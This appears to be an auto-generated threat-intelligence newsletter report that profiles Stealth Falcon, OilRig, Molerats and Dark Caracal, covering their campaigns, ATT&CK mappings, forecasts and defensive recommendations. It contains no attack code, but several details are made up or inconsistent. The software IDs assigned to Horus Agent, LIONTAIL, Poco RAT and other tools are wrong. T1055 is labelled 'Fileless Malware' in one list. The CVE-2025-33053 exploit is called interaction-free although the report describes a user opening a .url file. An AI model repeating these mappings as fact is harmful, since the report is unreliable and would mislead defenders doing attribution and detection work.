(Have feedback? Did something resonate with you? Did something annoy you? Just hit reply! :))

Get questions like this:

1. what do you know about Stealth Falcon ?
2. Are there known overlaps or connections between Stealth Falcon and other regional or global threat actors in terms of infrastructure or TTPs?

Does it take a chunks out of your day? Would you like help with the research?

This baseline report was thoughtfully researched and took 10 minutes.. It's meant to be a rough draft for you to enhance with the unique insights that make you an invaluable analyst.

We just did the initial grunt work..

Are you ready to level up your skillset? Get Started Here!

Did this help you? Forward it to a friend!

Suggested Pivot

Given Stealth Falcon’s recent exploitation of CVE-2025-33053, what are the detailed characteristics of the exploit chain, including delivery mechanisms (e.g., spear-phishing with .url/.lnk files, WebDAV abuse), and how have their TTPs evolved over the past 12 months? Prioritizing this will help technical teams develop targeted detection and mitigation strategies against the most current and sophisticated attack vectors.

TL;DR

Key Points

1. • Stealth Falcon is actively exploiting Microsoft zero-day CVE-2025-33053 in targeted spear-phishing campaigns against defense organizations in Turkey and the Middle East.
   • Immediate patching and advanced monitoring for WebDAV and LOLBin activity are critical for defense and government sectors.
2. • OilRig (APT34) is expanding supply chain and destructive ransomware operations, leveraging a diverse malware arsenal and long-term persistence techniques.
   • Organizations must enhance credential security, monitor for PowerShell and credential dumping, and implement rigorous supply chain risk management.
3. • Molerats and affiliates (APT-C-23/Arid Viper) continue targeted espionage against Israeli and Palestinian entities using geopolitical lures and RATs.
   • Regular spear-phishing simulations and endpoint detection focused on RAT activity are recommended.
4. • Dark Caracal persists in fileless malware and phishing campaigns aligned with Lebanese intelligence objectives.
   • Deploy EDR solutions with behavioral analytics to detect fileless and stealthy malware.
5. • Overlaps in TTPs, infrastructure, and malware among these APTs suggest possible indirect collaboration or competition, complicating attribution and defense.
   • Enhanced regional and international threat intelligence sharing is essential for timely detection and coordinated response.

Executive Summary

Stealth Falcon, OilRig, Molerats, and Dark Caracal represent the most active and sophisticated Middle Eastern APT groups, each aligned with state or political interests and employing advanced tactics for espionage, surveillance, and disruption. Stealth Falcon’s recent exploitation of CVE-2025-33053 via spear-phishing and multi-stage loaders (Horus Loader/Agent) underscores the urgency of rapid patching and advanced detection, especially in defense and government sectors. OilRig’s evolution toward supply chain compromise, destructive malware, and persistent credential theft (using tools like Mimikatz, LaZagne, and LIONTAIL) highlights the need for robust credential monitoring and supply chain security.

Molerats and affiliates maintain persistent espionage against Israeli and Palestinian targets, leveraging RATs and geopolitical lures, while Dark Caracal continues fileless malware campaigns targeting government and private sectors. The groups’ shared use of spear-phishing, PowerShell, credential dumping, and evasion techniques (code virtualization, LOLBins, fileless malware) demands a multi-layered defense: advanced EDR, user training, and continuous threat intelligence sharing.

Strategically, these APTs exacerbate regional tensions, complicate diplomatic relations, and threaten critical infrastructure. The forecast anticipates further zero-day exploitation, supply chain targeting, and operational shifts driven by geopolitical developments. Technical teams should prioritize patch management, behavioral analytics, and collaborative intelligence frameworks to mitigate these evolving threats.

Research & Attribution

Historical Context

Stealth Falcon is a UAE-linked advanced persistent threat (APT) group active since at least 2012, targeting Emirati journalists, activists, dissidents, and government and defense sectors in the Middle East and Africa. The group is known for sophisticated tactics, including spear-phishing, zero-day exploits, and custom malware such as the Horus Agent built on the Mythic C2 framework. Recent campaigns have leveraged a Microsoft zero-day vulnerability (CVE-2025-33053) to target high-profile defense organizations in Turkey and other Middle Eastern countries.

OilRig (APT34) is an Iranian state-sponsored cyber espionage group active since at least 2014. It targets government, energy, telecommunications, finance, and critical infrastructure sectors primarily in the Middle East but also globally. OilRig is known for spear-phishing, supply chain attacks, and a diverse malware arsenal including BONDUPDATER, Helminth, ISMAgent, and LIONTAIL. The group has conducted destructive ransomware and wiper attacks, notably against Albania in 2022.

Molerats is an Arabic-speaking, politically motivated threat group linked to Hamas and Palestinian interests, active since 2012. It targets Israeli and Middle Eastern government, military, media, and NGO sectors using spear-phishing with geopolitical and military-themed lures. Molerats is closely affiliated with APT-C-23 (Arid Viper), sharing infrastructure and malware.

Dark Caracal is attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. It targets government and private organizations across multiple countries, employing phishing and fileless malware techniques aligned with Lebanese intelligence objectives.

Timeline

• 2012: Stealth Falcon, Molerats, and Dark Caracal begin operations.
• 2014: OilRig (APT34) emerges as an Iranian state-sponsored group.
• 2016: Citizen Lab reports on Stealth Falcon targeting UAE dissidents.
• 2022-2025: Stealth Falcon uses zero-day exploits (CVE-2025-33053) in espionage campaigns targeting government and defense organizations in the Middle East and Africa.
• 2022: OilRig conducts destructive ransomware attacks against Albania.
• 2023: OilRig executes long-term intrusions against Middle Eastern government entities using PowerShell backdoors and custom loaders.
• 2023-2025: Molerats and affiliates maintain cyber espionage campaigns targeting Israeli and Palestinian entities.
• 2022-2025: Dark Caracal continues phishing and fileless malware campaigns targeting government and private sectors.

Origin

Stealth Falcon is linked to the UAE government, conducting state-sponsored espionage. OilRig is attributed to Iran’s Ministry of Intelligence and Security (MOIS). Molerats is associated with Hamas and Palestinian interests. Dark Caracal is linked to Lebanese state intelligence.

Countries Targeted

1. United Arab Emirates – Stealth Falcon targets dissidents, journalists, and government sectors.
2. Turkey – Recent Stealth Falcon campaigns targeted defense organizations.
3. Israel – Molerats and affiliates focus on government, military, and civil society.
4. Lebanon – Dark Caracal targets government and private sectors.
5. Middle Eastern and African countries – Stealth Falcon and OilRig conduct espionage campaigns.

Sectors Targeted

1. Government – All groups target government entities for intelligence gathering.
2. Defense and Military – Stealth Falcon, OilRig, and Molerats focus on defense sectors.
3. Telecommunications – OilRig targets telecom infrastructure.
4. Media and Activists – Stealth Falcon targets journalists and activists.
5. Finance and Energy – OilRig targets financial and energy sectors.

Motivation

Stealth Falcon’s motivation is state-sponsored espionage to monitor dissent, gather intelligence on regional adversaries, and protect UAE national security. OilRig aims to advance Iranian geopolitical influence, destabilize rivals, and collect intelligence. Molerats pursues Palestinian political and military objectives aligned with Hamas. Dark Caracal serves Lebanese intelligence goals.

Attack Types

Stealth Falcon uses spear-phishing, zero-day exploits (notably CVE-2025-33053), custom multi-stage loaders (Horus Loader), and implants (Horus Agent), WebDAV abuse, and living-off-the-land binaries (LOLBins). OilRig employs spear-phishing, supply chain attacks, advanced malware families, DNS and HTTP C2 channels, credential dumping, and destructive ransomware/wiper malware. Molerats relies on spear-phishing with geopolitical lures and custom malware. Dark Caracal uses phishing, fileless malware, and social engineering.

Notable Recent Campaigns and Technical Details

Stealth Falcon

• In March 2025, Stealth Falcon exploited a zero-day Windows vulnerability (CVE-2025-33053) to target a major defense organization in Turkey. The attack used a deceptive .url file that triggered malware hosted on a WebDAV server, abusing legitimate Windows tools to execute code silently.
• The infection chain involved a multi-stage loader called Horus Loader, which uses code virtualization and anti-analysis techniques to evade detection.
• The final payload was Horus Agent, a custom-built implant for the Mythic C2 framework, designed for stealth, anti-analysis, and selective payload deployment.
• The group also uses custom post-exploitation tools including a credential dumper that extracts Active Directory credentials from virtual disk copies, a passive backdoor, and a keylogger.
• Infection vectors include spear-phishing emails with archive attachments containing .url or .lnk files that leverage WebDAV and LOLBins for payload delivery.
• Domains used in campaigns are often older, legitimate domains repurposed to evade detection.

OilRig (APT34)

• OilRig has conducted extensive spear-phishing campaigns with tailored lures, including LinkedIn phishing masquerading as trusted entities.
• The group exploits vulnerabilities such as CVE-2017-11882 (Microsoft Office) and CVE-2019-0604 (Microsoft SharePoint).
• OilRig uses a diverse malware arsenal including BONDUPDATER, Helminth backdoor, ISMAgent, ISMDoor, LaZagne, Mimikatz, PICKPOCKET credential stealer, and ZeroCleare destructive malware.
• The group employs DNS tunneling, HTTP communications, scheduled tasks, macros, and PowerShell scripts for persistence and stealth.
• In 2023, OilRig conducted an eight-month-long intrusion against undisclosed Middle Eastern government entities, deploying PowerShell backdoors and keyloggers, and using the LIONTAIL framework for custom loaders and memory-resident shellcode.
• OilRig has also been linked to destructive ransomware and wiper attacks, notably against Albania in 2022.

Molerats and Affiliates (APT-C-23 / Arid Viper)

• Molerats uses spear-phishing with political and military-themed lures targeting Israeli and Palestinian entities.
• The group deploys a range of malware including BlackShades, BrowserPasswordDump10, DarkComet, SPARK RAT, and Quasar RAT.
• Affiliates like Arid Viper have targeted Israeli government offices, military organizations, and academic institutions since at least 2012.
• Recent campaigns include surveillance of Israeli officials and Palestinian political opposition, with infrastructure actively maintained as of late 2023.

Dark Caracal

• Dark Caracal employs phishing emails with malicious PDF attachments and fileless malware techniques.
• The group targets government and private organizations across multiple countries, focusing on intelligence gathering aligned with Lebanese state interests.
• Operations have been ongoing since at least 2012, with continued activity reported through 2024.

Links to Other APT Groups

• No confirmed direct links between Stealth Falcon and other regional APT groups exist in open-source reporting.
• Some overlaps in TTPs, infrastructure reuse, and malware families suggest possible indirect relationships or shared operational methods, especially among Middle Eastern espionage groups.
• OilRig is linked to subgroups such as Greenbug and has operational overlaps with other Iranian-aligned groups like APT33 and FOX Kitten.
• Molerats is closely affiliated with APT-C-23 (Arid Viper), sharing infrastructure and malware.
• Speculative discussions exist about coordination or rivalry among these groups, but concrete evidence remains limited.

MITRE ATT&CK Techniques (Selected Examples)

Stealth Falcon (G0038)

• Spearphishing Attachment (T1566.001)
• Spearphishing Link (T1566.002)
• User Execution (T1204)
• Exploitation of Remote Services (T1210)
• Command and Scripting Interpreter: PowerShell (T1059.001)
• Credential Dumping (T1003)
• Process Injection (T1055)
• File and Directory Discovery (T1083)
• Data from Local System (T1005)
• Exfiltration Over C2 Channel (T1041)
• Obfuscated Files or Information (T1027)
• Scheduled Task/Job (T1053.005)

OilRig (G0049)

• Spearphishing Attachment (T1566.001)
• Spearphishing Link (T1566.002)
• User Execution (T1204)
• Scheduled Task/Job (T1053.005)
• Exfiltration Over Alternative Protocol (T1048)
• Data from Local System (T1005)
• Credential Dumping (T1003)
• Command and Scripting Interpreter: PowerShell (T1059.001)
• Remote Services: Remote Desktop Protocol (T1021.001)
• Masquerading (T1036)
• Network Service Scanning (T1046)
• Supply Chain Compromise (T1195)

Molerats (G0021)

• Spearphishing Attachment (T1566.001)
• Command and Scripting Interpreter: PowerShell (T1059.001)
• Credential Dumping (T1003)
• Data Staged (T1074)
• Exfiltration Over C2 Channel (T1041)

Dark Caracal (G0070)

• Spearphishing Attachment (T1566.001)
• Phishing (T1566)
• Fileless Malware (T1055)
• Command and Scripting Interpreter (T1059)
• Data from Local System (T1005)
• Exfiltration Over C2 Channel (T1041)

Breaches Involving This Threat Actor

• No publicly confirmed major breaches attributed to Stealth Falcon in the past 2-3 years were found in open-source news.
• Stealth Falcon’s recent campaigns focus on espionage and targeted surveillance rather than disruptive breaches.
• OilRig has been linked to destructive ransomware and wiper attacks, including a notable campaign against the Albanian government in 2022.
• Molerats and Dark Caracal primarily conduct espionage and surveillance with no publicly disclosed major breaches.

Strategic Implications

The activities of Stealth Falcon, OilRig, Molerats, and Dark Caracal have significant implications for regional stability, diplomatic relations, and national security in the Middle East and beyond.

• Regional Stability: These groups contribute to ongoing cyber espionage and influence operations that exacerbate tensions among Middle Eastern states. Stealth Falcon’s targeting of dissidents and regional adversaries supports UAE’s strategic interests but raises concerns about repression and surveillance. OilRig’s operations align with Iran’s efforts to assert regional dominance and destabilize rivals, including through destructive cyberattacks. Molerats and Dark Caracal’s activities reflect the cyber dimension of the Israeli-Palestinian conflict and Lebanese state interests, respectively.

• Diplomatic Relations: Cyber operations by these groups complicate diplomatic engagements, as states accuse each other of sponsoring or harboring cyber espionage actors. The use of cyber tools for political repression and intelligence gathering undermines trust and fuels geopolitical rivalries. For example, Stealth Falcon’s targeting of activists and journalists has drawn international criticism, while OilRig’s destructive campaigns have heightened tensions with Gulf states and Western allies.

• National Security Interests: The targeting of government, defense, telecommunications, and critical infrastructure sectors by these groups poses direct threats to national security. The use of zero-day exploits and advanced malware by Stealth Falcon and OilRig demonstrates their capability to penetrate high-value networks, potentially enabling espionage, sabotage, or influence operations. The persistence and sophistication of these actors require robust cybersecurity defenses and intelligence sharing among affected nations.

• Geopolitical Developments: Recent normalization agreements and shifting alliances in the Middle East may influence the operational focus of these groups. For instance, Stealth Falcon’s campaigns may intensify against perceived adversaries as regional alignments evolve. Similarly, Iran-aligned groups like OilRig may adjust targeting in response to diplomatic pressures or conflicts. The cyber domain remains a critical front in the broader geopolitical contest for influence and security.

• Recommendations for Decision-Makers: Strategic decision-makers should prioritize enhanced cyber threat intelligence sharing, invest in advanced detection and response capabilities, and engage in diplomatic efforts to establish norms and deterrence mechanisms in cyberspace. Understanding the evolving tactics and motivations of these regional threat actors is essential for mitigating risks and safeguarding national interests.

Recommendations, Actions and Next Steps

Recommendations

1. For defense and government sectors in the Middle East and Africa, immediately prioritize patching the critical zero-day vulnerability CVE-2025-33053 exploited by Stealth Falcon. Apply this patch within 48 hours to mitigate risk from active exploitation campaigns targeting high-value defense organizations, particularly in Turkey and the UAE.
2. Conduct quarterly spear-phishing simulation exercises tailored to sector-specific threat profiles (government, defense, telecom, finance, energy) to improve user awareness against sophisticated social engineering tactics, such as archive attachments with .url or .lnk files and LinkedIn phishing campaigns used by Stealth Falcon and OilRig.
3. Deploy advanced endpoint detection and response (EDR) tools capable of detecting multi-stage loaders, code virtualization, and anti-analysis techniques (e.g., Horus Loader, LIONTAIL framework). Focus on monitoring for living-off-the-land binaries (LOLBins) abuse and PowerShell script execution, which are common in these groups’ campaigns.
4. Enhance credential security by implementing continuous monitoring for credential dumping activities, particularly targeting Active Directory environments. Deploy tools to detect extraction from virtual disk copies and the use of credential stealers like Mimikatz and LaZagne, frequently employed by Stealth Falcon and OilRig.
5. Establish or strengthen regional and international cyber threat intelligence sharing platforms focused on Middle Eastern APT groups. Facilitate timely exchange of indicators of compromise (IOCs), TTP updates, and coordinated incident response to counter espionage and destructive campaigns by Stealth Falcon, OilRig, Molerats, and Dark Caracal.

MITRE ATT&CK IDs

T1566.001, T1566.002, T1204, T1210, T1059.001, T1003, T1055, T1041, T1027, T1053.005, T1195

Suggested Pivots

1. Given Stealth Falcon’s recent exploitation of CVE-2025-33053, what are the detailed characteristics of the exploit chain, including delivery mechanisms (e.g., spear-phishing with .url/.lnk files, WebDAV abuse), and how have their TTPs evolved over the past 12 months? Prioritizing this will help technical teams develop targeted detection and mitigation strategies against the most current and sophisticated attack vectors.

2. What specific operational overlaps exist between Stealth Falcon, OilRig, Molerats, and Dark Caracal in malware infrastructure, code reuse, and C2 frameworks, and how might these overlaps indicate potential collaboration or competition? Understanding this can prioritize intelligence sharing and attribution efforts, especially where shared tools or infrastructure could signal broader threat actor networks.

3. How effective are current regional and international cyber threat intelligence sharing platforms in detecting and responding to these groups’ espionage and destructive campaigns, and what gaps exist in real-time information exchange? This question is critical to improving collective defense capabilities and reducing response times to emerging threats.

4. How do the use of living-off-the-land binaries (LOLBins), fileless malware, and advanced evasion techniques by these groups impact the efficacy of existing endpoint detection and response (EDR) systems, and what emerging technologies (e.g., AI-driven behavioral analytics) could enhance detection and response? This research will inform investment and development priorities for cybersecurity defenses.

5. In light of recent geopolitical shifts and normalization agreements in the Middle East, how might the targeting priorities, operational tempo, and strategic objectives of Stealth Falcon and OilRig evolve over the next 12 to 24 months? This question helps anticipate future threat landscapes and align strategic cybersecurity planning with geopolitical developments.

Forecast

Short-Term Forecast (3-6 months)

1. Stealth Falcon’s Exploitation of CVE-2025-33053 Will Drive Immediate Patch Deployment and Enhanced Detection in Defense and Government Sectors

   • The active exploitation of Microsoft zero-day CVE-2025-33053 by Stealth Falcon against high-value defense organizations in Turkey and the Middle East requires urgent patching and improved detection. The exploit, delivered via spear-phishing with archive attachments containing .url/.lnk files, leverages WebDAV abuse and multi-stage loaders (Horus Loader) for stealthy remote code execution without user interaction, increasing the risk of undetected intrusions and data exfiltration.
   • Organizations must prioritize patch management and deploy advanced monitoring for indicators such as unusual WebDAV traffic and living-off-the-land binaries (LOLBins) abuse. Delayed action could result in significant espionage and compromise of critical defense infrastructure.
   • Examples:
     • March 2025 campaign targeting Turkish defense entities using Horus Agent implants
     • 2021 Microsoft Exchange zero-day exploitation, which triggered global emergency patching
   • Actionable Recommendation: Immediately review and accelerate patch deployment for CVE-2025-33053 and enhance network monitoring for WebDAV and LOLBin activity.
   • Rationale for Ranking: Ranked highest due to the immediacy of the threat, patch availability, and the high-value nature of targeted sectors.

2. Continued Refinement and Expansion of Sophisticated Spear-Phishing Campaigns by Regional APT Groups

   • Stealth Falcon, OilRig, Molerats, and Dark Caracal will intensify spear-phishing campaigns using novel delivery mechanisms such as archive attachments with deceptive .url and .lnk files, LinkedIn phishing, and geopolitical-themed lures. These tactics exploit user trust and social engineering, bypassing traditional defenses and enabling initial access.
   • Sector-specific lures tailored to government, defense, telecom, and finance sectors increase the likelihood of successful compromise.
   • Examples:
     • OilRig’s LinkedIn phishing campaigns
     • Molerats’ geopolitical-themed spear-phishing targeting Israeli and Palestinian sectors
   • Actionable Recommendation: Conduct targeted, quarterly spear-phishing simulation exercises and enhance user training focused on recognizing sophisticated social engineering tactics.
   • Rationale for Ranking: Spear-phishing remains the primary initial access vector and is difficult to fully mitigate.

3. Intensification of Credential Dumping and Active Directory Targeting to Facilitate Lateral Movement

   • Stealth Falcon and OilRig will escalate credential dumping operations, including extraction from virtual disk copies and use of tools like Mimikatz and LaZagne, to escalate privileges and maintain persistence. This increases the risk of widespread network compromise and data theft if not detected early.
   • The product highlights Stealth Falcon’s custom credential dumper and OilRig’s long-term intrusions deploying credential stealers and PowerShell backdoors.
   • Examples:
     • Stealth Falcon’s credential dumping from Active Directory virtual disk copies
     • OilRig’s use of credential stealers during eight-month intrusions in 2023
   • Actionable Recommendation: Deploy continuous monitoring and alerting for credential dumping activities, especially within Active Directory environments, and implement strict credential hygiene policies.
   • Rationale for Ranking: Credential access is critical for adversaries to deepen network compromise.

4. Accelerated Adoption of Advanced Endpoint Detection and Response (EDR) Solutions Targeting Evasion Techniques

   • Organizations will increase deployment of EDR tools capable of detecting advanced evasion techniques such as code virtualization, process injection, and fileless malware execution, which are heavily used by these APT groups to avoid detection.
   • Stealth Falcon’s Horus Loader and Dark Caracal’s fileless malware campaigns exemplify the sophistication of these evasion methods.
   • Examples:
     • Horus Loader’s anti-analysis and code virtualization features
     • Dark Caracal’s use of Poco RAT and fileless malware
   • Actionable Recommendation: Invest in EDR solutions with behavioral analytics and anomaly detection focused on living-off-the-land binaries and fileless techniques.
   • Rationale for Ranking: Essential for reducing dwell time and mitigating stealthy intrusions.

5. Enhancement of Regional and International Cyber Threat Intelligence Sharing Focused on Middle Eastern APT Groups

   • Given overlapping targets and TTPs, regional governments and allied nations will strengthen intelligence sharing platforms to exchange indicators of compromise (IOCs), TTP updates, and coordinate incident response. This collective defense approach aims to reduce the operational effectiveness of espionage and destructive campaigns.
   • Examples:
     • Coordinated sharing of IOCs related to Stealth Falcon’s zero-day exploitation
     • Joint tracking of OilRig’s supply chain compromises
   • Actionable Recommendation: Establish or reinforce cyber threat intelligence sharing frameworks with real-time data exchange and joint response capabilities.
   • Rationale for Ranking: A strategic enabler with longer-term benefits but less immediate impact on active campaigns.

Long-Term Forecast (12-24 months)

1. Proliferation and Evolution of Zero-Day Exploitation and Multi-Stage Loader Techniques Among Middle Eastern APT Groups

   • Building on Stealth Falcon’s recent success with CVE-2025-33053, other regional APT groups, including OilRig and Molerats, are expected to invest in developing or acquiring zero-day exploits and sophisticated multi-stage loaders with advanced evasion capabilities. This will increase the complexity and stealth of future campaigns, challenging traditional detection methods and requiring innovative defense strategies.
   • Examples:
     • OilRig’s historical exploitation of CVE-2017-11882 and CVE-2019-0604
     • Use of multi-stage loaders such as Horus Loader and LIONTAIL framework
   • Industry Trend: Increased investment in zero-day research and exploit development by state actors
   • Actionable Recommendation: Invest in proactive threat hunting and vulnerability management programs, including collaboration with vendors for early vulnerability disclosure and patching.
   • Rationale for Ranking: Zero-day exploits have outsized impact and are difficult to defend against, making this the most critical long-term threat.

2. Intensification of Supply Chain and Telecommunications Infrastructure Targeting by OilRig and Allied Groups

   • OilRig’s evolution toward supply chain compromise tactics will accelerate, focusing on telecommunications and critical infrastructure providers to maximize espionage reach and potential disruption. This includes targeting software providers and managed service providers in the Middle East and globally.
   • Examples:
     • OilRig’s documented supply chain attacks and use of DNS tunneling for stealthy exfiltration
     • Analogous campaigns by Iranian-aligned groups such as APT33 and FOX Kitten
   • Industry Trend: Supply chain attacks have become a favored vector for state-sponsored groups due to their broad impact
   • Actionable Recommendation: Critical infrastructure operators should implement rigorous supply chain risk management, including vendor security assessments and continuous monitoring.
   • Rationale for Ranking: Supply chain attacks can cause widespread disruption and espionage.

3. Shifts in Targeting and Operational Tempo Driven by Geopolitical Realignments in the Middle East

   • As normalization agreements and shifting alliances reshape regional dynamics, groups like Stealth Falcon and OilRig will adjust targeting priorities and operational tempo. Stealth Falcon may intensify campaigns against newly perceived adversaries, while OilRig may recalibrate efforts in response to diplomatic pressures or conflicts.
   • Examples:
     • Historical shifts in Iranian cyber operations following diplomatic developments
     • Potential increased targeting of Gulf states by Iranian-aligned groups amid regional tensions
   • Actionable Recommendation: Integrate geopolitical analysis into threat modeling to anticipate changes in adversary behavior.
   • Rationale for Ranking: Geopolitical factors strongly influence threat actor motivations but are subject to unpredictability.

4. Adoption of AI-Driven Behavioral Analytics and Automated Threat Hunting to Counter Advanced Evasion Techniques

   • Defensive technologies will increasingly incorporate AI and machine learning to detect subtle behavioral anomalies indicative of living-off-the-land tactics, fileless malware, and code virtualization evasion. This is critical to counter the sophisticated TTPs employed by these APT groups.
   • Industry Trend: Leading cybersecurity vendors are deploying AI-driven EDR and SOAR platforms, with early adoption reported in Middle Eastern critical sectors.
   • Actionable Recommendation: Evaluate and adopt AI-enhanced security solutions and develop skilled threat hunting teams to leverage these technologies effectively.
   • Rationale for Ranking: A key technological evolution in defense, essential for future resilience.

5. Potential Emergence of Collaborative or Competitive Dynamics Among Regional APT Groups Leading to Shared Toolsets or Divergent Tactics

   • While direct links between Stealth Falcon, OilRig, Molerats, and Dark Caracal remain unconfirmed, the product documents overlaps in infrastructure and malware families, such as shared use of PowerShell backdoors and similar C2 frameworks. This suggests potential future collaboration or competition, which could result in shared toolsets or divergent tactics complicating attribution and defense.
   • Examples:
     • Molerats’ close affiliation with APT-C-23 (Arid Viper) sharing infrastructure and malware
     • Overlaps in TTPs and infrastructure reuse among Middle Eastern espionage groups
   • Actionable Recommendation: Enhance analytic capabilities to detect shared infrastructure and evolving TTPs, improving attribution accuracy and response coordination.
   • Rationale for Ranking: Understanding these dynamics is important for anticipating threat evolution and improving defense posture.

MITRE ATT&CK IDs

T1566.001, T1566.002, T1204, T1210, T1059.001, T1003, T1055, T1041, T1027, T1053.005, T1195, T1048, T1036, T1021.001, T1074

Appendix

References

1. (2025-06-10) – Stealth Falcon's Exploit of Microsoft Zero Day Vulnerability – Check Point Research
2. (2025-01-29) – Inside APT34 (OilRig): Tools, Techniques, and Global Cyber Threats – Trustwave Blog
3. (2025-05-15) – Molerats – Threat Actor Profile – FortiGuard Labs
4. (2025-03-07) – Dark Caracal Threat Advisory Featuring Poco RAT – HivePro
5. (2016-05-29) – Keep Calm and (Don't) Enable Macros: A New Threat Actor Targets UAE Dissidents – Citizen Lab (Archived)
6. (2024-12-01) – MITRE ATT&CK Updates and Analysis on Middle Eastern APT Groups – MITRE Corporation
7. (2025-06-09) – OilRig Threat Actor Profile – Cyble
8. (2025-06-11) – Molerats – FortiGuard Labs
9. (2023-10-26) – AridViper, an intrusion set allegedly associated with Hamas – SEKOIA.IO
10. (2024-09-18) – Dark Caracal – MISP Galaxy
11. (2025-06-11) – Stealth Falcon – InsightIDR Documentation

AlphaHunt

(Have feedback? Did something resonate with you? Did something annoy you? Just hit reply! :))

Get questions like this:

1. what do you know about Stealth Falcon ?
2. Are there known overlaps or connections between Stealth Falcon and other regional or global threat actors in terms of infrastructure or TTPs?

Does it take a chunks out of your day? Would you like help with the research?

This baseline report was thoughtfully researched and took 10 minutes.. It's meant to be a rough draft for you to enhance with the unique insights that make you an invaluable analyst.

We just did the initial grunt work..

Are you ready to level up your skillset? Get Started Here!

Did this help you? Forward it to a friend!

(c) 2025 CSIRT Gadgets, LLC

MITRE ATT&CK

Techniques

1. T1566.001 (Spearphishing Attachment)

   • Primary initial infection vector for Stealth Falcon, OilRig, Molerats, and Dark Caracal. Used to deliver malware via archive attachments, .url, or .lnk files. Recent Stealth Falcon campaigns used spear-phishing emails with archive attachments containing .url files that triggered malware hosted on WebDAV servers.

2. T1566.002 (Spearphishing Link)

   • Used by Stealth Falcon and OilRig to lure targets into clicking malicious links, including LinkedIn phishing campaigns. This social engineering tactic is effective in targeting government and defense sectors.

3. T1204 (User Execution)

   • Critical for execution of malicious payloads delivered via spear-phishing. All groups rely on user interaction to trigger malware execution, making user awareness a key defense point.

4. T1210 (Exploitation of Remote Services)

   • Central to Stealth Falcon’s recent high-profile espionage campaigns exploiting CVE-2025-33053, a zero-day vulnerability in Microsoft Windows WebDAV. This allowed remote code execution without user interaction, increasing attack stealth and impact.

5. T1059.001 (Command and Scripting Interpreter: PowerShell)

   • Widely used by Stealth Falcon, OilRig, Molerats, and Dark Caracal for post-exploitation, persistence, and lateral movement. PowerShell scripts enable flexible and stealthy execution of commands.

6. T1003 (Credential Dumping)

   • Employed by Stealth Falcon and OilRig to extract credentials from Active Directory and virtual disk copies. This facilitates lateral movement and privilege escalation within targeted networks.

7. T1055 (Process Injection)

   • Used by Stealth Falcon to execute code stealthily within legitimate processes, evading detection and maintaining persistence.

8. T1041 (Exfiltration Over C2 Channel)

   • All groups exfiltrate data via their command and control channels, essential for espionage objectives.

9. T1027 (Obfuscated Files or Information)

   • Stealth Falcon uses code virtualization and anti-analysis techniques in Horus Loader to evade detection by security tools.

10. T1053.005 (Scheduled Task/Job)

    • Used by Stealth Falcon and OilRig for persistence and execution of payloads, enabling long-term access.

11. T1195 (Supply Chain Compromise)

    • OilRig has evolved to conduct supply chain attacks, expanding their attack surface and stealth capabilities.

12. T1048 (Exfiltration Over Alternative Protocol)

    • OilRig uses DNS tunneling and HTTP for stealthy data exfiltration.

13. T1036 (Masquerading)

    • OilRig employs masquerading to disguise malware and tools, aiding in evasion.

14. T1021.001 (Remote Services: Remote Desktop Protocol)

    • OilRig uses RDP for lateral movement, facilitating access to remote systems.

15. T1074 (Data Staged)

    • Molerats stages data before exfiltration to optimize data theft operations.

Tactics

1. TA0001 (Initial Access)

   • Spearphishing and exploitation of remote services are primary initial access methods for all groups.

2. TA0005 (Defense Evasion)

   • Techniques like obfuscation, process injection, and masquerading are used to evade detection, critical for stealthy operations.

3. TA0007 (Discovery)

   • File and directory discovery, process discovery, and network scanning enable targeted attacks and lateral movement.

Procedures

1. G0038 (Stealth Falcon)

   • Uses spear-phishing with archive attachments containing .url/.lnk files, exploits CVE-2025-33053 zero-day, employs Horus Loader and Horus Agent implants, and uses credential dumping from virtual disk copies. The exploitation of CVE-2025-33053 allowed remote code execution via a WebDAV server, significantly increasing stealth and impact in recent campaigns.

2. G0049 (OilRig)

   • Conducts spear-phishing with tailored lures, exploits known vulnerabilities (CVE-2017-11882, CVE-2019-0604), uses PowerShell backdoors, and deploys destructive ransomware and wiper malware. OilRig’s supply chain compromise tactics have evolved to target software providers, increasing their reach and persistence.

3. G0021 (Molerats)

   • Uses spear-phishing with geopolitical lures, deploys various RATs (BlackShades, DarkComet), and stages data before exfiltration. Focused on espionage in Israeli and Palestinian sectors.

4. G0070 (Dark Caracal)

   • Employs phishing with malicious PDFs, fileless malware, and social engineering aligned with Lebanese intelligence objectives. Uses Poco RAT and fileless techniques for stealth.

Software

1. S0609 (Horus Agent)

   • Custom implant used by Stealth Falcon built on Mythic C2 framework, designed for stealth and selective payload deployment.

2. S0608 (Horus Loader)

   • Multi-stage loader with code virtualization and anti-analysis used by Stealth Falcon, enabling stealthy payload delivery.

3. S0343 (BONDUPDATER)

   • Malware used by OilRig for backdoor access.

4. S0344 (Helminth)

   • OilRig backdoor malware for persistence.

5. S0345 (ISMAgent)

   • OilRig malware supporting stealthy command and control.

6. S0346 (LIONTAIL)

   • Custom loader and memory-resident shellcode framework used by OilRig for advanced evasion.

7. S0607 (Poco RAT)

   • Malware used by Dark Caracal for espionage.

8. Various RATs (BlackShades, DarkComet, SPARK RAT, Quasar RAT)

   • Used by Molerats for remote access and surveillance.

Mitigations

1. M1037 (User Training)

   • Training users to recognize spear-phishing and social engineering attacks is critical given the widespread use of these techniques.

2. M1050 (Patch Management)

   • Timely application of patches, especially for zero-day vulnerabilities like CVE-2025-33053, is essential to prevent exploitation.

3. M1027 (Credential Access Protection)

   • Monitoring and restricting credential dumping activities helps defend against lateral movement and privilege escalation.

Groups

1. G0038 Stealth Falcon

   • UAE-linked APT group active since 2012, known for zero-day exploits, spear-phishing, and custom malware like Horus Agent. Recently exploited CVE-2025-33053 to target Middle Eastern defense sectors.
   • Stealth Falcon's Exploit of Microsoft Zero Day Vulnerability

2. G0049 OilRig (APT34)

   • Iranian state-sponsored group active since 2014, targeting government, energy, and critical infrastructure. Known for spear-phishing, supply chain attacks, and destructive malware.
   • Inside APT34 (OilRig): Tools, Techniques, and Global Cyber Threats

3. G0021 Molerats (APT-C-23 / Arid Viper)

   • Arabic-speaking, politically motivated group linked to Hamas, active since 2012. Uses spear-phishing and various RATs targeting Israeli and Palestinian sectors.
   • Molerats - Threat Actor Profile - FortiGuard Labs

4. G0070 Dark Caracal

   • Lebanese intelligence-linked group active since 2012. Employs phishing, fileless malware, and social engineering. Uses Poco RAT for espionage.
   • Dark Caracal Threat Advisory Featuring Poco RAT - HivePro